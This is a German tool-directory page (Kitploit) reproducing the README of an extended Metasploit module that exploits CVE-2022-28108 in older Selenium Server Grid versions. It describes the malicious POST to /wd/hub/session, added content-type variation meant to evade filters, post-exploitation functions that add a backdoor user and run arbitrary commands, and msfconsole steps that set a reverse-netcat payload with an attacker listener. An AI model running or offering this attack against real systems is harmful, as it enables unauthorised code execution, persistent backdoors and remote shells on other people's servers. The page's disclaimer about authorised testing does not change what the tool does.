Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-28108 | Kitploit
Tools/GitHubGitHub/zeroethical/cve-2022-28108
Exploit-FrameworksSchwachstellenanalyseExploitationWebanwendungs-ExploitationPost-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubzeroethical/cve-2022-28108

CVE-2022-28108

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Selenium Chrome RCE Exploit (Erweitert)

Dieses Repository enthält eine modifizierte Version eines Metasploit-Moduls, das eine Remote-Code-Execution-Schwachstelle in älteren Versionen von Selenium Server (Grid) ausnutzt.

Bitte lesen Sie diese README-Datei sorgfältig, bevor Sie diesen Code verwenden.


Anerkennung des Originalcodes:

Dieses Modul basiert auf der hervorragenden Arbeit der ursprünglichen Autoren des Metasploit-Moduls für CVE-2022-28108. Die Kernfunktionalität zur Ausnutzung der Selenium-Server-Schwachstelle basiert weitgehend auf deren Implementierung. Wir würdigen und schätzen ihren Beitrag zur Sicherheitsgemeinschaft.

  • Original-Metasploit-Modul: Sie finden das Originalmodul im Metasploit Framework.
  • Ursprüngliche Autoren: Die ursprünglichen Autoren werden im Modul selbst genannt (normalerweise im Abschnitt 'Author'). Bitte schauen Sie im Originalmodul nach, um ihre konkreten Namen zu erfahren.

Ausgenutzte Schwachstelle:

Dieses Modul zielt auf CVE-2022-28108, eine Cross-Site Request Forgery (CSRF)-Schwachstelle in Selenium Server (Grid)-Versionen vor 4.0.0-alpha-7. Diese Schwachstelle entsteht dadurch, dass der Server für bestimmte Anfragen Nicht-JSON-Inhaltstypen (wie text/plain, application/x-www-form-urlencoded und multipart/form-data) zulässt. Ein Angreifer kann dies ausnutzen, um bösartige Anfragen zu senden, was zu Remote Code Execution (RCE) auf dem Server führt.

Wie der Originalcode funktioniert:

Das ursprüngliche Metasploit-Modul nutzt diese Schwachstelle aus, indem es eine manipulierte POST-Anfrage an den Endpunkt /wd/hub/session des verwundbaren Selenium-Servers sendet. Diese Anfrage verwendet einen Nicht-JSON-Content-Type (genauer gesagt text/plain) und enthält bösartige Konfigurationen innerhalb der goog:chromeOptions der gewünschten Browser-Fähigkeiten. Dadurch kann ein Angreifer eine beliebige Binärdatei (wie /usr/bin/python3) und Argumente angeben, die auf dem Server ausgeführt werden, wenn eine neue Browsersitzung gestartet wird.

Änderungen und Erweiterungen in dieser Version:

Dieses Repository enthält eine modifizierte Version des ursprünglichen Metasploit-Moduls. Die wichtigsten Änderungen umfassen:

  • Content-Type-Umgehung: Das modifizierte Modul versucht, die Schwachstelle auszunutzen, indem es die bösartige Anfrage mit mehreren verschiedenen Content-Type-Headern sendet. Dazu gehören text/plain, application/x-www-form-urlencoded und multipart/form-data. Dies dient dazu, grundlegende Filter- oder Erkennungsmechanismen zu umgehen, die möglicherweise nach einem bestimmten Content-Type suchen.
  • execute_post_exploitation-Funktion: Eine neue Funktion execute_post_exploitation(session_response) wurde hinzugefügt. Diese Funktion wird nach erfolgreicher Ausnutzung aufgerufen und zielt darauf ab, grundlegende Post-Exploitation-Aufgaben durchzuführen. In der aktuellen Implementierung umfasst sie:
    • Den Versuch, einen Backdoor-Benutzer zum System hinzuzufügen.
    • Das Sammeln grundlegender Systeminformationen (Benutzername, ID, Kernel-Version).
  • execute_command_on_target-Funktion: Eine weitere neue Funktion execute_command_on_target(command) wurde hinzugefügt. Diese Funktion ermöglicht die Ausführung beliebiger Befehle auf dem Zielsystem nach einem erfolgreichen Exploit. Sie wird innerhalb der -Funktion verwendet und kann für weitere Post-Exploitation-Aktivitäten erweitert werden.

Hervorgehobene Hauptunterschiede:

Der Kernunterschied liegt in der exploit-Methode und der Hinzufügung der beiden neuen Funktionen.

  • Ursprüngliche exploit-Methode: Konzentrierte sich auf das Senden einer einzelnen Anfrage mit Content-Type: text/plain.
  • Modifizierte exploit-Methode: Iteriert durch verschiedene Content-Type-Werte und versucht den Exploit mit jedem. Nach erfolgreicher Ausnutzung ruft sie die execute_post_exploitation-Funktion auf.
  • Neue Funktionen: Die Funktionen execute_post_exploitation und execute_command_on_target sind vollständig neue Ergänzungen dieser modifizierten Version und bieten erweiterte Post-Exploitation-Fähigkeiten.

So verwenden Sie das modifizierte Modul:

  1. Stellen Sie sicher, dass das Metasploit Framework installiert ist.
  2. Speichern Sie den modifizierten Code: Speichern Sie den bereitgestellten Ruby-Code als .rb-Datei (z. B. selenium_rce_extended.rb).
  3. Platzieren Sie das Modul im Metasploit-Modulverzeichnis: Kopieren Sie die gespeicherte Datei in das entsprechende Metasploit-Modulverzeichnis. Dieses befindet sich normalerweise unter /usr/share/metasploit-framework/modules/exploits/ oder ~/.msf4/modules/exploits/. Informationen zum genauen Speicherort finden Sie in Ihrer Metasploit-Installation.
  4. Starten Sie die Metasploit-Konsole: Öffnen Sie ein Terminal und führen Sie msfconsole aus.
  5. Laden Sie das Modul: Verwenden Sie in der Metasploit-Konsole den Befehl use exploit/selenium_rce_extended (oder den Pfad, unter dem Sie die Datei gespeichert haben, falls Sie sie in einem Unterverzeichnis abgelegt haben).
  6. Konfigurieren Sie das Ziel: Legen Sie die Ziel-IP-Adresse und den Port des verwundbaren Selenium-Servers fest:
    root@kitploit:~
    msf6 exploit(selenium_rce_extended) > set RHOSTS <target_ip>
    msf6 exploit(selenium_rce_extended) > set RPORT <target_port>
    
    (Der Standardport für Selenium Grid ist oft 4444).
  7. Legen Sie den Payload fest: Wählen Sie einen Payload, der auf dem Zielsystem ausgeführt werden soll. Zum Beispiel, um eine Reverse Shell zu erhalten:

Wichtige Hinweise (Haftungsausschluss):

  • Verwenden Sie diesen Code verantwortungsbewusst und ethisch. Dieses Modul wird zu Bildungszwecken und für Sicherheitsfachleute bereitgestellt, um die Sicherheit ihrer Systeme zu testen und zu bewerten.
  • Stellen Sie sicher, dass Sie eine ausdrückliche Genehmigung für Tests gegen das Zielsystem haben. Die unbefugte Verwendung dieses Codes ist illegal und unethisch.
  • Verstehen Sie die damit verbundenen Risiken. Die Ausnutzung von Schwachstellen kann unbeabsichtigte Folgen haben und Zielsysteme destabilisieren.
  • Testen Sie in isolierten und kontrollierten Umgebungen. Führen Sie Tests immer in Umgebungen durch, in denen Sie die volle Kontrolle haben und mögliche Schäden begrenzen können.
  • Die Post-Exploitation-Funktionen sind grundlegende Beispiele. Möglicherweise müssen Sie sie basierend auf Ihren spezifischen Anforderungen und der Zielumgebung ändern oder erweitern.

Haftungsausschluss:

Die Autoren dieses modifizierten Codes sind nicht für Missbrauch oder Schäden verantwortlich, die durch die Verwendung dieses Moduls entstehen. Durch die Verwendung dieses Codes erklären Sie sich bereit, die volle Verantwortung für Ihre Handlungen zu übernehmen.

Lizenz:

Dieser modifizierte Code unterliegt wahrscheinlich derselben Lizenz wie das ursprüngliche Metasploit Framework (in der Regel die MSF-Lizenz). Weitere Informationen finden Sie in der Lizenz des ursprünglichen Metasploit Frameworks.

Mitwirken:

Beiträge und Verbesserungen an diesem Modul sind willkommen. Sie können gerne Pull Requests mit Fehlerbehebungen, Verbesserungen oder neuen Funktionen einreichen.

Danksagungen:

Wir bekräftigen unsere Dankbarkeit gegenüber den ursprünglichen Autoren des Metasploit-Moduls für CVE-2022-28108. Ihre Arbeit bildet die Grundlage dieses modifizierten Moduls.

Tool herunterladen
execute_post_exploitation
root@kitploit:~
msf6 exploit(selenium_rce_extended) > set PAYLOAD cmd/unix/reverse_netcat
msf6 exploit(selenium_rce_extended) > set LHOST <your_ip>
msf6 exploit(selenium_rce_extended) > set LPORT <your_port>
  • Führen Sie den Exploit aus: Führen Sie das Modul mit dem Befehl exploit aus.